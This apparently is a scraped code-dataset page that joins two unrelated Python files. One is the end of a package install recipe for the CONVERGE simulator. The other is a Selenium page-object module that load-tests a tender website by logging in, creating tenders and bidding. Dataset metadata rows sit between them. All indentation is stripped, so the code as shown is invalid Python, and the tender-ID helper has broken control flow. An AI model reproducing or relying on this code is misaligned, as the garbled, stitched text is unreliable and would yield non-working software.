elif 'intel-mpi' in spec or 'intel-parallel-studio+mpi' in spec:
converge = glob.glob('converge-*-intel*')
# No Intel MPI version of post_convert
post_convert = glob.glob('post_convert_serial*')
elif 'mpich' in spec:
converge = glob.glob('converge-*-mpich*')
post_convert = glob.glob('post_convert_mpich*')
elif 'mvapich2' in spec:
converge = glob.glob('converge-*-mvapich*')
# MVAPICH2 hasn't been supported since CONVERGE
# came with a single serial post_convert
post_convert = glob.glob('post_convert')
elif 'openmpi' in spec:
converge = glob.glob('converge-*-o*mpi*')
post_convert = glob.glob('post_convert_o*mpi*')
elif 'platform-mpi' in spec:
converge = glob.glob('converge-*-pmpi*')
post_convert = glob.glob('post_convert_pmpi*')
else:
raise InstallError('Unsupported MPI provider')
make_surface = glob.glob('make_surface*')
# Old versions of CONVERGE come with a single serial post_convert
if not post_convert:
post_convert = glob.glob('post_convert')
# Make sure glob actually found something
if not converge:
raise InstallError('converge executable not found')
if not post_convert:
raise InstallError('post_convert executable not found')
if not make_surface:
raise InstallError('make_surface executable not found')
# Make sure glob didn't find multiple matches
if len(converge) > 1:
raise InstallError('multiple converge executables found')
if len(post_convert) > 1:
raise InstallError('multiple post_convert executables found')
if len(make_surface) > 1:
raise InstallError('multiple make_surface executables found')
converge = converge[0]
post_convert = post_convert[0]
make_surface = make_surface[0]
mkdir(prefix.bin)
# Install the executables
install(converge, join_path(prefix.bin, converge))
install(post_convert, join_path(prefix.bin, post_convert))
install(make_surface, join_path(prefix.bin, make_surface))
with working_dir(prefix.bin):
# Create generic symlinks to all executables
if not os.path.exists('converge'):
os.symlink(converge, 'converge')
if not os.path.exists('post_convert'):
os.symlink(post_convert, 'post_convert')
if not os.path.exists('make_surface'):
os.symlink(make_surface, 'make_surface')
def setup_run_environment(self, env):
# CONVERGE searches for a valid license file in:
# $CONVERGE_ROOT/license/license.lic
env.set('CONVERGE_ROOT', self.prefix)
| 47.608108
| 131
| 0.600341
|
9eb6bf0e41398f024786afbbeb62e3c1dd3d59ad
| 11,173
|
py
|
Python
|
govauction_load/page_objects.py
|
lesiavl/selenium_perfomance_tests
|
83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe
|
[
"Apache-2.0"
] | null | null | null |
govauction_load/page_objects.py
|
lesiavl/selenium_perfomance_tests
|
83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe
|
[
"Apache-2.0"
] | null | null | null |
govauction_load/page_objects.py
|
lesiavl/selenium_perfomance_tests
|
83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import selenium.webdriver.support.ui as ui
from selenium.common.exceptions import NoSuchElementException, TimeoutException, ElementNotVisibleException
from locators import *
from time import sleep
import service
def wait_before_click(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.element_to_be_clickable((select_type, element)))
def wait_until_visible(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.visibility_of_element_located((select_type, element)))
def wait_until_invisible(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.invisibility_of_element_located((select_type, element)))
def wait_for_presence(driver, element, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.presence_of_element_located((select_type, element)))
def wait_for_text_presence(driver, element, text, select_type=By.XPATH):
return ui.WebDriverWait(driver, 20).until(
EC.text_to_be_present_in_element((select_type, element), text))
def close_notif(driver):
for i in range(1):
try:
wait_until_visible(driver, close_notification, select_type=By.CSS_SELECTOR)
close_notif = driver.find_element_by_css_selector(close_notification)
sleep(2)
if close_notif.is_displayed():
sleep(1)
wait_before_click(driver, close_notification, select_type=By.CSS_SELECTOR)
driver.find_element_by_css_selector(close_notification).click()
else:
return False
except TimeoutException:
break
class LoginPage:
def __init__(self, email, password, driver):
self.driver = driver
self.email = email
self.password = password
def login_as_owner(self):
wait_until_visible(self.driver, login_button, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(login_button).click()
wait_before_click(self.driver, username_field, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(username_field).send_keys(self.email)
self.driver.find_element_by_css_selector(pass_field).send_keys(self.password)
self.driver.find_element_by_css_selector(submit_login_button).click()
close_notif(self.driver)
def login_as_provider(self):
wait_until_visible(self.driver, login_button, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(login_button).click()
wait_before_click(self.driver, username_field, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(username_field).send_keys(self.email)
self.driver.find_element_by_css_selector(pass_field).send_keys(self.password)
self.driver.find_element_by_css_selector(submit_login_button).click()
wait_until_visible(self.driver, login_verif, select_type=By.CSS_SELECTOR)
sleep(1)
close_notif(self.driver)
self.driver.get('http://25h8-exchange.byustudio.in.ua/tenders/index')
class CreateTenderPage:
def __init__(self, driver):
self.driver = driver
def create_tender(self):
self.driver.execute_script("window.scrollTo(0, 318);")
wait_until_visible(self.driver, input_value_amount, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_value_amount).click()
# sleep(2)
self.driver.find_element_by_css_selector(input_value_amount).send_keys(10000)
self.driver.find_element_by_css_selector(input_min_step).send_keys(100)
self.driver.execute_script("window.scrollTo(0, 525);")
self.driver.find_element_by_css_selector(input_title).send_keys('LOAD_TEST_Below_Threshold')
self.driver.find_element_by_css_selector(input_description).send_keys('LOAD_TEST_Below_Threshold')
file_to_upload = service.relative2absolute('./doc1.docx')
sleep(1)
self.driver.find_element_by_xpath(add_doc).send_keys(file_to_upload)
wait_until_visible(self.driver, '//input[@name="Tender[documents][0][title]"]', select_type=By.XPATH)
# self.driver.find_element_by_xpath(submit_doc).click()
wait_until_visible(self.driver, input_item_description, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_item_description).send_keys('LOAD_TEST_Below_Threshold')
self.driver.find_element_by_css_selector(input_quantity).send_keys(10)
self.driver.execute_script("window.scrollTo(0, 973);")
self.driver.find_element_by_css_selector(select_cpv).click()
wait_until_visible(self.driver, select_cpv_1item, select_type=By.XPATH)
self.driver.find_element_by_xpath(select_cpv_1item).click()
wait_for_presence(self.driver, confirm_cpv, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(confirm_cpv).click()
self.driver.execute_script("window.scrollTo(0, 1404);")
wait_until_visible(self.driver, select_country, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(select_country).click()
wait_until_visible(self.driver, select_dropdown_region, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(select_dropdown_region).click()
self.driver.find_element_by_css_selector(input_locality).send_keys(u"Ковель")
self.driver.find_element_by_css_selector(input_delivery_address).send_keys("Random Valid Address, 7741")
self.driver.find_element_by_css_selector(input_postal_code).send_keys('02010')
self.driver.find_element_by_css_selector(input_delivery_start_date).click()
self.driver.find_element_by_css_selector(input_delivery_start_date).clear()
delivery_start = service.time_service()[3]
wait_until_visible(self.driver, input_delivery_start_date, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_delivery_start_date).send_keys(delivery_start)
self.driver.find_element_by_css_selector(input_delivery_end_date).click()
self.driver.find_element_by_css_selector(input_delivery_end_date).clear()
delivery_end = service.time_service()[4]
self.driver.find_element_by_css_selector(input_delivery_end_date).send_keys(delivery_end)
self.driver.execute_script("window.scrollTo(0, 2165);")
self.driver.find_element_by_css_selector(input_end_enquiry).click()
self.driver.find_element_by_css_selector(input_end_enquiry).clear()
enquiry_end = service.time_service()[0]
self.driver.find_element_by_css_selector(input_end_enquiry).send_keys(enquiry_end)
self.driver.find_element_by_css_selector(input_start_tender).click()
self.driver.find_element_by_css_selector(input_start_tender).clear()
tender_start = service.time_service()[1]
self.driver.find_element_by_css_selector(input_start_tender).send_keys(tender_start)
self.driver.find_element_by_css_selector(input_end_tender).click()
self.driver.find_element_by_css_selector(input_end_tender).clear()
tender_end = service.time_service()[2]
self.driver.find_element_by_css_selector(input_end_tender).send_keys(tender_end)
wait_until_visible(self.driver, input_procuring_entity, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_procuring_entity).click()
self.driver.execute_script("window.scrollTo(0, 2283);")
wait_until_visible(self.driver, submit_create_tender, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(submit_create_tender).click()
class FindTenderPage(CreateTenderPage):
def get_tender_id(self):
matched = False
try:
def find_id():
sleep(5)
self.driver.refresh()
wait_until_visible(self.driver, tender_get_id_locator)
tender_id = self.driver.find_element_by_xpath(tender_get_id_locator).text
matched = True
return tender_id
# Sometimes we need to wait for it
while not matched:
sleep(5)
self.driver.refresh()
tender_id = find_id()
break
except TimeoutException:
self.driver.close()
tender_id = self.driver.find_element_by_xpath(tender_get_id_locator).text
return tender_id
def find_tender(self, id_tender):
tender_id = id_tender
try:
self.driver.get('http://25h8-exchange.byustudio.in.ua/tenders/index')
close_notif(self.driver)
except (TimeoutException, ElementNotVisibleException):
wait_until_visible(self.driver, input_search_field, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_search_field).send_keys(tender_id)
self.driver.find_element_by_css_selector(search_tender_button).click()
sleep(1)
wait_for_presence(self.driver, select_tender, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(select_tender).click()
return tender_id
class MakeBidPage:
def __init__(self, driver):
self.driver = driver
def make_bid(self):
# "LOAD_TEST_Below_Threshold"
is_found = False
for i in range(1, 100):
try:
wait_until_visible(self.driver, input_bid_amount, select_type=By.CSS_SELECTOR)
self.driver.find_element_by_css_selector(input_bid_amount).click()
self.driver.find_element_by_css_selector(input_bid_amount).send_keys(10000)
wait_until_visible(self.driver, submit_bid_button, select_type=By.CSS_SELECTOR)
is_found = True
break
except (TimeoutException, NoSuchElementException, ElementNotVisibleException):
sleep(15)
self.driver.refresh()
self.driver.execute_script("window.scrollTo(0, 3238);")
if not is_found:
return False
self.driver.execute_script("window.scrollTo(0, 3238);")
# file_to_upload = service.relative2absolute('./doc1.docx')
# self.driver.find_element_by_xpath(add_doc).send_keys(file_to_upload)
# wait_until_visible(self.driver, '#hidden_document_original > div > div:nth-child(1) > div:nth-child(1) > label', select_type=By.CSS_SELECTOR)
# self.driver.find_element_by_xpath(add_doc).click()
return True
def run_bid(self):
sleep(3)
self.driver.find_element_by_css_selector(submit_bid_button).click()
sleep(5)
try:
wait_for_presence(self.driver, delete_bid_button, select_type=By.CSS_SELECTOR)
sleep(5)
except TimeoutException as error:
print(error)
raise error
return True
| 45.234818
| 151
| 0.721113
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.